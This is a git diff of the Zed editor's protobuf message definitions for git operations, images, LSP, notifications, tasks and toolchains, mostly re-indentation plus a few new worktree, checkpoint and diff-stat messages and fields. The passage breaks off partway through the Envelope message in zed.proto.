-1,277 +1,256 @@ syntax = "proto3"; package zed.messages; -import "worktree.proto"; import "buffer.proto"; +import "worktree.proto"; message GitBranchesResponse { - repeated Branch branches = 1; + repeated Branch branches = 1; } message UpdateDiffBases { - uint64 project_id = 1; - uint64 buffer_id = 2; - - enum Mode { - // No collaborator is using the unstaged diff. - HEAD_ONLY = 0; - // No collaborator is using the diff from HEAD. - INDEX_ONLY = 1; - // Both the unstaged and uncommitted diffs are demanded, - // and the contents of the index and HEAD are the same for this path. - INDEX_MATCHES_HEAD = 2; - // Both the unstaged and uncommitted diffs are demanded, - // and the contents of the index and HEAD differ for this path, - // where None means the path doesn't exist in that state of the repo. - INDEX_AND_HEAD = 3; - } - - optional string staged_text = 3; - optional string committed_text = 4; - Mode mode = 5; + uint64 project_id = 1; + uint64 buffer_id = 2; + + enum Mode { + // No collaborator is using the unstaged diff. + HEAD_ONLY = 0; + // No collaborator is using the diff from HEAD. + INDEX_ONLY = 1; + // Both the unstaged and uncommitted diffs are demanded, + // and the contents of the index and HEAD are the same for this path. + INDEX_MATCHES_HEAD = 2; + // Both the unstaged and uncommitted diffs are demanded, + // and the contents of the index and HEAD differ for this path, + // where None means the path doesn't exist in that state of the repo. + INDEX_AND_HEAD = 3; + } + + optional string staged_text = 3; + optional string committed_text = 4; + Mode mode = 5; } message OpenUnstagedDiff { - uint64 project_id = 1; - uint64 buffer_id = 2; + uint64 project_id = 1; + uint64 buffer_id = 2; } message OpenUnstagedDiffResponse { - optional string staged_text = 1; + optional string staged_text = 1; } message OpenUncommittedDiff { - uint64 project_id = 1; - uint64 buffer_id = 2; + uint64 project_id = 1; + uint64 buffer_id = 2; } message OpenUncommittedDiffResponse { - enum Mode { - INDEX_MATCHES_HEAD = 0; - INDEX_AND_HEAD = 1; - } - optional string staged_text = 1; - optional string committed_text = 2; - Mode mode = 3; + enum Mode { + INDEX_MATCHES_HEAD = 0; + INDEX_AND_HEAD = 1; + } + optional string staged_text = 1; + optional string committed_text = 2; + Mode mode = 3; } message SetIndexText { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string path = 4; - optional string text = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string path = 4; + optional string text = 5; } message GetPermalinkToLine { - uint64 project_id = 1; - uint64 buffer_id = 2; - Range selection = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + Range selection = 3; } message GetPermalinkToLineResponse { - string permalink = 1; + string permalink = 1; } message Branch { - bool is_head = 1; - string ref_name = 2; - optional uint64 unix_timestamp = 3; - optional GitUpstream upstream = 4; - optional CommitSummary most_recent_commit = 5; + bool is_head = 1; + string ref_name = 2; + optional uint64 unix_timestamp = 3; + optional GitUpstream upstream = 4; + optional CommitSummary most_recent_commit = 5; } message GitUpstream { - string ref_name = 1; - optional UpstreamTracking tracking = 2; + string ref_name = 1; + optional UpstreamTracking tracking = 2; } message UpstreamTracking { - uint64 ahead = 1; - uint64 behind = 2; + uint64 ahead = 1; + uint64 behind = 2; } message CommitSummary { - string sha = 1; - string subject = 2; - int64 commit_timestamp = 3; - string author_name = 4; + string sha = 1; + string subject = 2; + int64 commit_timestamp = 3; + string author_name = 4; } message GitBranches { - uint64 project_id = 1; - ProjectPath repository = 2; + uint64 project_id = 1; + ProjectPath repository = 2; } - message UpdateGitBranch { - uint64 project_id = 1; - string branch_name = 2; - ProjectPath repository = 3; + uint64 project_id = 1; + string branch_name = 2; + ProjectPath repository = 3; } message UpdateRepository { - uint64 project_id = 1; - uint64 id = 2; - string abs_path = 3; - repeated uint64 entry_ids = 4; - optional Branch branch_summary = 5; - repeated StatusEntry updated_statuses = 6; - repeated string removed_statuses = 7; - repeated string current_merge_conflicts = 8; - uint64 scan_id = 9; - bool is_last_update = 10; - optional GitCommitDetails head_commit_details = 11; - optional string merge_message = 12; - repeated StashEntry stash_entries = 13; - optional string remote_upstream_url = 14; - optional string remote_origin_url = 15; + uint64 project_id = 1; + uint64 id = 2; + string abs_path = 3; + repeated uint64 entry_ids = 4; + optional Branch branch_summary = 5; + repeated StatusEntry updated_statuses = 6; + repeated string removed_statuses = 7; + repeated string current_merge_conflicts = 8; + uint64 scan_id = 9; + bool is_last_update = 10; + optional GitCommitDetails head_commit_details = 11; + optional string merge_message = 12; + repeated StashEntry stash_entries = 13; + optional string remote_upstream_url = 14; + optional string remote_origin_url = 15; + optional string original_repo_abs_path = 16; + repeated Worktree linked_worktrees = 17; } message RemoveRepository { - uint64 project_id = 1; - uint64 id = 2; + uint64 project_id = 1; + uint64 id = 2; } enum GitStatus { - Added = 0; - Modified = 1; - Conflict = 2; - Deleted = 3; - Updated = 4; - TypeChanged = 5; - Renamed = 6; - Copied = 7; - Unmodified = 8; + Added = 0; + Modified = 1; + Conflict = 2; + Deleted = 3; + Updated = 4; + TypeChanged = 5; + Renamed = 6; + Copied = 7; + Unmodified = 8; } message GitFileStatus { - oneof variant { - Untracked untracked = 1; - Ignored ignored = 2; - Unmerged unmerged = 3; - Tracked tracked = 4; - } - - message Untracked {} - message Ignored {} - message Unmerged { - GitStatus first_head = 1; - GitStatus second_head = 2; - } - message Tracked { - GitStatus index_status = 1; - GitStatus worktree_status = 2; - } + oneof variant { + Untracked untracked = 1; + Ignored ignored = 2; + Unmerged unmerged = 3; + Tracked tracked = 4; + } + + message Untracked {} + message Ignored {} + message Unmerged { + GitStatus first_head = 1; + GitStatus second_head = 2; + } + message Tracked { + GitStatus index_status = 1; + GitStatus worktree_status = 2; + } } message GitGetBranches { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; } message GitCreateBranch { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string branch_name = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string branch_name = 4; } message GitChangeBranch { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string branch_name = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string branch_name = 4; } message GitRenameBranch { - uint64 project_id = 1; - uint64 repository_id = 2; - string branch = 3; - string new_name = 4; + uint64 project_id = 1; + uint64 repository_id = 2; + string branch = 3; + string new_name = 4; } message GitCreateRemote { - uint64 project_id = 1; - uint64 repository_id = 2; - string remote_name = 3; - string remote_url = 4; + uint64 project_id = 1; + uint64 repository_id = 2; + string remote_name = 3; + string remote_url = 4; } message GitRemoveRemote { - uint64 project_id = 1; - uint64 repository_id = 2; - string remote_name = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + string remote_name = 3; } message GitDeleteBranch { - uint64 project_id = 1; - uint64 repository_id = 2; - string branch_name = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + string branch_name = 3; + bool is_remote = 4; } message GitDiff { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - DiffType diff_type = 4; - optional string merge_base_ref = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + DiffType diff_type = 4; + optional string merge_base_ref = 5; - enum DiffType { - HEAD_TO_WORKTREE = 0; - HEAD_TO_INDEX = 1; - MERGE_BASE = 2; - } + enum DiffType { + HEAD_TO_WORKTREE = 0; + HEAD_TO_INDEX = 1; + MERGE_BASE = 2; + } } message GitDiffResponse { - string diff = 1; -} - -message GitDiffStat { - uint64 project_id = 1; - uint64 repository_id = 2; - DiffType diff_type = 3; - optional string merge_base_ref = 4; - - enum DiffType { - HEAD_TO_WORKTREE = 0; - HEAD_TO_INDEX = 1; - MERGE_BASE = 2; - } -} - -message GitDiffStatResponse { - repeated GitDiffStatEntry entries = 1; -} - -message GitDiffStatEntry { - string path = 1; - uint32 added = 2; - uint32 deleted = 3; + string diff = 1; } message GitInit { - uint64 project_id = 1; - string abs_path = 2; - string fallback_branch_name = 3; + uint64 project_id = 1; + string abs_path = 2; + string fallback_branch_name = 3; } message GitClone { - uint64 project_id = 1; - string abs_path = 2; - string remote_repo = 3; + uint64 project_id = 1; + string abs_path = 2; + string remote_repo = 3; } message GitCloneResponse { - bool success = 1; + bool success = 1; } message CheckForPushedCommits { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; } message CheckForPushedCommitsResponse { @@ -279,338 +258,402 @@ message CheckForPushedCommitsResponse { } message GitShow { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; } message GitCommitDetails { - string sha = 1; - string message = 2; - int64 commit_timestamp = 3; - string author_email = 4; - string author_name = 5; + string sha = 1; + string message = 2; + int64 commit_timestamp = 3; + string author_email = 4; + string author_name = 5; } message LoadCommitDiff { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; } message LoadCommitDiffResponse { - repeated CommitFile files = 1; + repeated CommitFile files = 1; } message CommitFile { - string path = 1; - optional string old_text = 2; - optional string new_text = 3; - bool is_binary = 4; + string path = 1; + optional string old_text = 2; + optional string new_text = 3; + bool is_binary = 4; } message GitReset { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; - ResetMode mode = 5; - enum ResetMode { - SOFT = 0; - MIXED = 1; - } + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; + ResetMode mode = 5; + enum ResetMode { + SOFT = 0; + MIXED = 1; + } } message GitCheckoutFiles { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string commit = 4; - repeated string paths = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string commit = 4; + repeated string paths = 5; } message GitFileHistory { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string path = 4; - uint64 skip = 5; - optional uint64 limit = 6; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string path = 4; + uint64 skip = 5; + optional uint64 limit = 6; } message GitFileHistoryResponse { - repeated FileHistoryEntry entries = 1; - string path = 2; + repeated FileHistoryEntry entries = 1; + string path = 2; } message FileHistoryEntry { - string sha = 1; - string subject = 2; - string message = 3; - int64 commit_timestamp = 4; - string author_name = 5; - string author_email = 6; + string sha = 1; + string subject = 2; + string message = 3; + int64 commit_timestamp = 4; + string author_name = 5; + string author_email = 6; } // Move to `git.proto` once collab's min version is >=0.171.0. message StatusEntry { - string repo_path = 1; - // Can be removed once collab's min version is >=0.171.0. - GitStatus simple_status = 2; - GitFileStatus status = 3; + string repo_path = 1; + // Can be removed once collab's min version is >=0.171.0. + GitStatus simple_status = 2; + GitFileStatus status = 3; + optional uint32 diff_stat_added = 4; + optional uint32 diff_stat_deleted = 5; } message StashEntry { - bytes oid = 1; - string message = 2; - optional string branch = 3; - uint64 index = 4; - int64 timestamp = 5; + bytes oid = 1; + string message = 2; + optional string branch = 3; + uint64 index = 4; + int64 timestamp = 5; } message Stage { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - repeated string paths = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + repeated string paths = 4; } message Unstage { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - repeated string paths = 4; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + repeated string paths = 4; } message Stash { - uint64 project_id = 1; - uint64 repository_id = 2; - repeated string paths = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + repeated string paths = 3; } message StashPop { - uint64 project_id = 1; - uint64 repository_id = 2; - optional uint64 stash_index = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + optional uint64 stash_index = 3; } message StashApply { - uint64 project_id = 1; - uint64 repository_id = 2; - optional uint64 stash_index = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + optional uint64 stash_index = 3; } message StashDrop { - uint64 project_id = 1; - uint64 repository_id = 2; - optional uint64 stash_index = 3; + uint64 project_id = 1; + uint64 repository_id = 2; + optional uint64 stash_index = 3; } message Commit { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - optional string name = 4; - optional string email = 5; - string message = 6; - optional CommitOptions options = 7; - reserved 8; - uint64 askpass_id = 9; - - message CommitOptions { - bool amend = 1; - bool signoff = 2; - } + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + optional string name = 4; + optional string email = 5; + string message = 6; + optional CommitOptions options = 7; + reserved 8; + uint64 askpass_id = 9; + + message CommitOptions { + bool amend = 1; + bool signoff = 2; + bool allow_empty = 3; + } } message OpenCommitMessageBuffer { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; } message Push { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string remote_name = 4; - string branch_name = 5; - optional PushOptions options = 6; - uint64 askpass_id = 7; - string remote_branch_name = 8; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string remote_name = 4; + string branch_name = 5; + optional PushOptions options = 6; + uint64 askpass_id = 7; + string remote_branch_name = 8; - enum PushOptions { - SET_UPSTREAM = 0; - FORCE = 1; - } + enum PushOptions { + SET_UPSTREAM = 0; + FORCE = 1; + } } message Fetch { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - uint64 askpass_id = 4; - optional string remote = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + uint64 askpass_id = 4; + optional string remote = 5; } message GetRemotes { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - optional string branch_name = 4; - bool is_push = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + optional string branch_name = 4; + bool is_push = 5; } message GetRemotesResponse { - repeated Remote remotes = 1; + repeated Remote remotes = 1; - message Remote { - string name = 1; - } + message Remote { + string name = 1; + } } message Pull { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - string remote_name = 4; - optional string branch_name = 5; - uint64 askpass_id = 6; - bool rebase = 7; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + string remote_name = 4; + optional string branch_name = 5; + uint64 askpass_id = 6; + bool rebase = 7; } message RemoteMessageResponse { - string stdout = 1; - string stderr = 2; + string stdout = 1; + string stderr = 2; } message BlameBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; } message BlameEntry { - bytes sha = 1; + bytes sha = 1; - uint32 start_line = 2; - uint32 end_line = 3; - uint32 original_line_number = 4; + uint32 start_line = 2; + uint32 end_line = 3; + uint32 original_line_number = 4; - optional string author = 5; - optional string author_mail = 6; - optional int64 author_time = 7; - optional string author_tz = 8; + optional string author = 5; + optional string author_mail = 6; + optional int64 author_time = 7; + optional string author_tz = 8; - optional string committer = 9; - optional string committer_mail = 10; - optional int64 committer_time = 11; - optional string committer_tz = 12; + optional string committer = 9; + optional string committer_mail = 10; + optional int64 committer_time = 11; + optional string committer_tz = 12; - optional string summary = 13; - optional string previous = 14; + optional string summary = 13; + optional string previous = 14; - string filename = 15; + string filename = 15; } message CommitMessage { - bytes oid = 1; - string message = 2; + bytes oid = 1; + string message = 2; } message CommitPermalink { - bytes oid = 1; - string permalink = 2; + bytes oid = 1; + string permalink = 2; } message BlameBufferResponse { - message BlameResponse { - repeated BlameEntry entries = 1; - repeated CommitMessage messages = 2; - reserved 3; - reserved 4; - } + message BlameResponse { + repeated BlameEntry entries = 1; + repeated CommitMessage messages = 2; + reserved 3; + reserved 4; + } - optional BlameResponse blame_response = 5; + optional BlameResponse blame_response = 5; - reserved 1 to 4; + reserved 1 to 4; } message GetDefaultBranch { - uint64 project_id = 1; - uint64 repository_id = 2; + uint64 project_id = 1; + uint64 repository_id = 2; } message GetDefaultBranchResponse { - optional string branch = 1; + optional string branch = 1; } message GetTreeDiff { - uint64 project_id = 1; - uint64 repository_id = 2; - bool is_merge = 3; - string base = 4; - string head = 5; + uint64 project_id = 1; + uint64 repository_id = 2; + bool is_merge = 3; + string base = 4; + string head = 5; } message GetTreeDiffResponse { - repeated TreeDiffStatus entries = 1; + repeated TreeDiffStatus entries = 1; } message TreeDiffStatus { - enum Status { - ADDED = 0; - MODIFIED = 1; - DELETED = 2; - } + enum Status { + ADDED = 0; + MODIFIED = 1; + DELETED = 2; + } - Status status = 1; - string path = 2; - optional string oid = 3; + Status status = 1; + string path = 2; + optional string oid = 3; } message GetBlobContent { - uint64 project_id = 1; - uint64 repository_id = 2; - string oid =3; + uint64 project_id = 1; + uint64 repository_id = 2; + string oid = 3; } message GetBlobContentResponse { - string content = 1; + string content = 1; } message GitGetWorktrees { - uint64 project_id = 1; - uint64 repository_id = 2; + uint64 project_id = 1; + uint64 repository_id = 2; +} + +message GitGetHeadSha { + uint64 project_id = 1; + uint64 repository_id = 2; +} + +message GitGetHeadShaResponse { + optional string sha = 1; } message GitWorktreesResponse { - repeated Worktree worktrees = 1; + repeated Worktree worktrees = 1; } message Worktree { - string path = 1; - string ref_name = 2; - string sha = 3; + string path = 1; + string ref_name = 2; + string sha = 3; + bool is_main = 4; } message GitCreateWorktree { - uint64 project_id = 1; - uint64 repository_id = 2; - string name = 3; - string directory = 4; - optional string commit = 5; + uint64 project_id = 1; + uint64 repository_id = 2; + string name = 3; + string directory = 4; + optional string commit = 5; +} + +message GitCreateCheckpoint { + uint64 project_id = 1; + uint64 repository_id = 2; +} + +message GitCreateCheckpointResponse { + bytes commit_sha = 1; +} + +message GitRestoreCheckpoint { + uint64 project_id = 1; + uint64 repository_id = 2; + bytes commit_sha = 3; +} + +message GitCompareCheckpoints { + uint64 project_id = 1; + uint64 repository_id = 2; + bytes left_commit_sha = 3; + bytes right_commit_sha = 4; +} + +message GitCompareCheckpointsResponse { + bool equal = 1; +} + +message GitDiffCheckpoints { + uint64 project_id = 1; + uint64 repository_id = 2; + bytes base_commit_sha = 3; + bytes target_commit_sha = 4; +} + +message GitDiffCheckpointsResponse { + string diff = 1; +} + +message GitRemoveWorktree { + uint64 project_id = 1; + uint64 repository_id = 2; + string path = 3; + bool force = 4; +} + +message GitRenameWorktree { + uint64 project_id = 1; + uint64 repository_id = 2; + string old_path = 3; + string new_path = 4; } message RunGitHook { - enum GitHook { - PRE_COMMIT = 0; - reserved 1; - } - - uint64 project_id = 1; - uint64 repository_id = 2; - GitHook hook = 3; + enum GitHook { + PRE_COMMIT = 0; + reserved 1; + } + + uint64 project_id = 1; + uint64 repository_id = 2; + GitHook hook = 3; } diff --git a/crates/proto/proto/image.proto b/crates/proto/proto/image.proto index e3232e6847cbc719280bc3ccd5254e5e368dbeb6..ff791e1f87b6089e6e87ec746fad173b180f10ef 100644 --- a/crates/proto/proto/image.proto +++ b/crates/proto/proto/image.proto @@ -5,32 +5,32 @@ import "core.proto"; import "worktree.proto"; message OpenImageByPath { - uint64 project_id = 1; - uint64 worktree_id = 2; - string path = 3; + uint64 project_id = 1; + uint64 worktree_id = 2; + string path = 3; } message OpenImageResponse { - uint64 image_id = 1; + uint64 image_id = 1; } message CreateImageForPeer { - uint64 project_id = 1; - PeerId peer_id = 2; - oneof variant { - ImageState state = 3; - ImageChunk chunk = 4; - } + uint64 project_id = 1; + PeerId peer_id = 2; + oneof variant { + ImageState state = 3; + ImageChunk chunk = 4; + } } message ImageState { - uint64 id = 1; - optional File file = 2; - uint64 content_size = 3; - string format = 4; // e.g., "png", "jpeg", "webp", etc. + uint64 id = 1; + optional File file = 2; + uint64 content_size = 3; + string format = 4; // e.g., "png", "jpeg", "webp", etc. } message ImageChunk { - uint64 image_id = 1; - bytes data = 2; + uint64 image_id = 1; + bytes data = 2; } diff --git a/crates/proto/proto/lsp.proto b/crates/proto/proto/lsp.proto index 9132dafbd42be8e1f7d0de2b1278d7bf757aa9ac..813f9e9ec652a7b97281bea29f368b0dcf37d537 100644 --- a/crates/proto/proto/lsp.proto +++ b/crates/proto/proto/lsp.proto @@ -2,8 +2,6 @@ syntax = "proto3"; package zed.messages; import "buffer.proto"; -import "core.proto"; -import "worktree.proto"; message GetDefinition { uint64 project_id = 1; @@ -232,6 +230,7 @@ message ApplyCompletionAdditionalEdits { uint64 project_id = 1; uint64 buffer_id = 2; Completion completion = 3; + repeated AnchorRange all_commit_ranges = 4; } message ApplyCompletionAdditionalEditsResponse { diff --git a/crates/proto/proto/notification.proto b/crates/proto/proto/notification.proto index ebd3d7fe447991c38c9d616fc944f366f51782c0..8a41854ac161100c60d66d0b27b49bc4b2182a22 100644 --- a/crates/proto/proto/notification.proto +++ b/crates/proto/proto/notification.proto @@ -2,36 +2,36 @@ syntax = "proto3"; package zed.messages; message GetNotifications { - optional uint64 before_id = 1; + optional uint64 before_id = 1; } message AddNotification { - Notification notification = 1; + Notification notification = 1; } message GetNotificationsResponse { - repeated Notification notifications = 1; - bool done = 2; + repeated Notification notifications = 1; + bool done = 2; } message DeleteNotification { - uint64 notification_id = 1; + uint64 notification_id = 1; } message UpdateNotification { - Notification notification = 1; + Notification notification = 1; } message MarkNotificationRead { - uint64 notification_id = 1; + uint64 notification_id = 1; } message Notification { - uint64 id = 1; - uint64 timestamp = 2; - string kind = 3; - optional uint64 entity_id = 4; - string content = 5; - bool is_read = 6; - optional bool response = 7; + uint64 id = 1; + uint64 timestamp = 2; + string kind = 3; + optional uint64 entity_id = 4; + string content = 5; + bool is_read = 6; + optional bool response = 7; } diff --git a/crates/proto/proto/task.proto b/crates/proto/proto/task.proto index 1844087d623cc3eac0e5d7500a50dfb31028f304..8d941c2438c55045d8d38cb4c97d918be8abbeb4 100644 --- a/crates/proto/proto/task.proto +++ b/crates/proto/proto/task.proto @@ -4,57 +4,57 @@ package zed.messages; import "buffer.proto"; message TaskContextForLocation { - uint64 project_id = 1; - Location location = 2; - map task_variables = 3; + uint64 project_id = 1; + Location location = 2; + map task_variables = 3; } message TaskContext { - optional string cwd = 1; - map task_variables = 2; - map project_env = 3; + optional string cwd = 1; + map task_variables = 2; + map project_env = 3; } message Shell { - message WithArguments { - string program = 1; - repeated string args = 2; - } + message WithArguments { + string program = 1; + repeated string args = 2; + } - oneof shell_type { - System system = 1; - string program = 2; - WithArguments with_arguments = 3; - } + oneof shell_type { + System system = 1; + string program = 2; + WithArguments with_arguments = 3; + } } message System {} enum RevealStrategy { - RevealAlways = 0; - RevealNever = 1; + RevealAlways = 0; + RevealNever = 1; } enum HideStrategy { - HideAlways = 0; - HideNever = 1; - HideOnSuccess = 2; + HideAlways = 0; + HideNever = 1; + HideOnSuccess = 2; } message SpawnInTerminal { - string label = 1; - optional string command = 2; - repeated string args = 3; - map env = 4; - optional string cwd = 5; + string label = 1; + optional string command = 2; + repeated string args = 3; + map env = 4; + optional string cwd = 5; } message GetDirectoryEnvironment { - uint64 project_id = 1; - Shell shell = 2; - string directory = 3; + uint64 project_id = 1; + Shell shell = 2; + string directory = 3; } message DirectoryEnvironment { - map environment = 1; + map environment = 1; } diff --git a/crates/proto/proto/toolchain.proto b/crates/proto/proto/toolchain.proto index b190322ca0602078ea28d00fe970e4958fb17fb0..a91948148e64eb9eff7f1ca657dab203a9ca7f1f 100644 --- a/crates/proto/proto/toolchain.proto +++ b/crates/proto/proto/toolchain.proto @@ -2,58 +2,58 @@ syntax = "proto3"; package zed.messages; message ListToolchains { - uint64 project_id = 1; - uint64 worktree_id = 2; - string language_name = 3; - optional string path = 4; + uint64 project_id = 1; + uint64 worktree_id = 2; + string language_name = 3; + optional string path = 4; } message Toolchain { - string name = 1; - string path = 2; - string raw_json = 3; + string name = 1; + string path = 2; + string raw_json = 3; } message ToolchainGroup { - uint64 start_index = 1; - string name = 2; + uint64 start_index = 1; + string name = 2; } message ListToolchainsResponse { - repeated Toolchain toolchains = 1; - bool has_values = 2; - repeated ToolchainGroup groups = 3; - optional string relative_worktree_path = 4; + repeated Toolchain toolchains = 1; + bool has_values = 2; + repeated ToolchainGroup groups = 3; + optional string relative_worktree_path = 4; } message ActivateToolchain { - uint64 project_id = 1; - uint64 worktree_id = 2; - Toolchain toolchain = 3; - string language_name = 4; - optional string path = 5; + uint64 project_id = 1; + uint64 worktree_id = 2; + Toolchain toolchain = 3; + string language_name = 4; + optional string path = 5; } message ActiveToolchain { - uint64 project_id = 1; - uint64 worktree_id = 2; - string language_name = 3; - optional string path = 4; + uint64 project_id = 1; + uint64 worktree_id = 2; + string language_name = 3; + optional string path = 4; } message ActiveToolchainResponse { - optional Toolchain toolchain = 1; + optional Toolchain toolchain = 1; } message ResolveToolchain { - uint64 project_id = 1; - string abs_path = 2; - string language_name = 3; + uint64 project_id = 1; + string abs_path = 2; + string language_name = 3; } message ResolveToolchainResponse { - oneof response { - Toolchain toolchain = 1; - string error = 2; - } + oneof response { + Toolchain toolchain = 1; + string error = 2; + } } diff --git a/crates/proto/proto/zed.proto b/crates/proto/proto/zed.proto index fa55e1f27330fb5fee88fb19296f607b1bf9f3a6..8b62754d7af40b7c4f5e1a87ad42899d682ba453 100644 --- a/crates/proto/proto/zed.proto +++ b/crates/proto/proto/zed.proto @@ -18,495 +18,495 @@ import "toolchain.proto"; import "worktree.proto"; // Looking for a number? Search "// current max" - message Envelope { - uint32 id = 1; - optional uint32 responding_to = 2; - optional PeerId original_sender_id = 3; - optional uint32 ack_id = 266; - - oneof payload { - Hello hello = 4; - Ack ack = 5; - Error error = 6; - Ping ping = 7; - Test test = 8; - EndStream end_stream = 165; - - CreateRoom create_room = 9; - CreateRoomResponse create_room_response = 10; - JoinRoom join_room = 11; - JoinRoomResponse join_room_response = 12; - RejoinRoom rejoin_room = 13; - RejoinRoomResponse rejoin_room_response = 14; - LeaveRoom leave_room = 15; - Call call = 16; - IncomingCall incoming_call = 17; - CallCanceled call_canceled = 18; - CancelCall cancel_call = 19; - DeclineCall decline_call = 20; - UpdateParticipantLocation update_participant_location = 21; - RoomUpdated room_updated = 22; - - ShareProject share_project = 23; - ShareProjectResponse share_project_response = 24; - UnshareProject unshare_project = 25; - JoinProject join_project = 26; - JoinProjectResponse join_project_response = 27; - LeaveProject leave_project = 28; - AddProjectCollaborator add_project_collaborator = 29; - UpdateProjectCollaborator update_project_collaborator = 30; - RemoveProjectCollaborator remove_project_collaborator = 31; - - GetDefinition get_definition = 32; - GetDefinitionResponse get_definition_response = 33; - GetDeclaration get_declaration = 237; - GetDeclarationResponse get_declaration_response = 238; - GetTypeDefinition get_type_definition = 34; - GetTypeDefinitionResponse get_type_definition_response = 35; - - GetReferences get_references = 36; - GetReferencesResponse get_references_response = 37; - GetDocumentHighlights get_document_highlights = 38; - GetDocumentHighlightsResponse get_document_highlights_response = 39; - GetProjectSymbols get_project_symbols = 40; - GetProjectSymbolsResponse get_project_symbols_response = 41; - OpenBufferForSymbol open_buffer_for_symbol = 42; - OpenBufferForSymbolResponse open_buffer_for_symbol_response = 43; - - UpdateProject update_project = 44; - UpdateWorktree update_worktree = 45; - - CreateProjectEntry create_project_entry = 46; - RenameProjectEntry rename_project_entry = 47; - CopyProjectEntry copy_project_entry = 48; - DeleteProjectEntry delete_project_entry = 49; - ProjectEntryResponse project_entry_response = 50; - ExpandProjectEntry expand_project_entry = 51; - ExpandProjectEntryResponse expand_project_entry_response = 52; - ExpandAllForProjectEntry expand_all_for_project_entry = 291; - ExpandAllForProjectEntryResponse expand_all_for_project_entry_response = 292; - UpdateDiagnosticSummary update_diagnostic_summary = 53; - StartLanguageServer start_language_server = 54; - UpdateLanguageServer update_language_server = 55; - - OpenBufferById open_buffer_by_id = 56; - OpenBufferByPath open_buffer_by_path = 57; - OpenBufferResponse open_buffer_response = 58; - CreateBufferForPeer create_buffer_for_peer = 59; - UpdateBuffer update_buffer = 60; - UpdateBufferFile update_buffer_file = 61; - SaveBuffer save_buffer = 62; - BufferSaved buffer_saved = 63; - BufferReloaded buffer_reloaded = 64; - ReloadBuffers reload_buffers = 65; - ReloadBuffersResponse reload_buffers_response = 66; - SynchronizeBuffers synchronize_buffers = 67; - SynchronizeBuffersResponse synchronize_buffers_response = 68; - FormatBuffers format_buffers = 69; - FormatBuffersResponse format_buffers_response = 70; - GetCompletions get_completions = 71; - GetCompletionsResponse get_completions_response = 72; - ResolveCompletionDocumentation resolve_completion_documentation = 73; - ResolveCompletionDocumentationResponse resolve_completion_documentation_response = 74; - ApplyCompletionAdditionalEdits apply_completion_additional_edits = 75; - ApplyCompletionAdditionalEditsResponse apply_completion_additional_edits_response = 76; - GetCodeActions get_code_actions = 77; - GetCodeActionsResponse get_code_actions_response = 78; - GetHover get_hover = 79; - GetHoverResponse get_hover_response = 80; - ApplyCodeAction apply_code_action = 81; - ApplyCodeActionResponse apply_code_action_response = 82; - PrepareRename prepare_rename = 83; - PrepareRenameResponse prepare_rename_response = 84; - PerformRename perform_rename = 85; - PerformRenameResponse perform_rename_response = 86; - - UpdateContacts update_contacts = 89; - ShowContacts show_contacts = 91; - - GetUsers get_users = 92; - FuzzySearchUsers fuzzy_search_users = 93; - UsersResponse users_response = 94; - RequestContact request_contact = 95; - RespondToContactRequest respond_to_contact_request = 96; - RemoveContact remove_contact = 97; - - Follow follow = 98; - FollowResponse follow_response = 99; - UpdateFollowers update_followers = 100; - Unfollow unfollow = 101; - UpdateDiffBases update_diff_bases = 104; - - OnTypeFormatting on_type_formatting = 105; - OnTypeFormattingResponse on_type_formatting_response = 106; - - UpdateWorktreeSettings update_worktree_settings = 107; - - InlayHints inlay_hints = 108; - InlayHintsResponse inlay_hints_response = 109; - ResolveInlayHint resolve_inlay_hint = 110; - ResolveInlayHintResponse resolve_inlay_hint_response = 111; - RefreshInlayHints refresh_inlay_hints = 112; - - CreateChannel create_channel = 113; - CreateChannelResponse create_channel_response = 114; - InviteChannelMember invite_channel_member = 115; - RemoveChannelMember remove_channel_member = 116; - 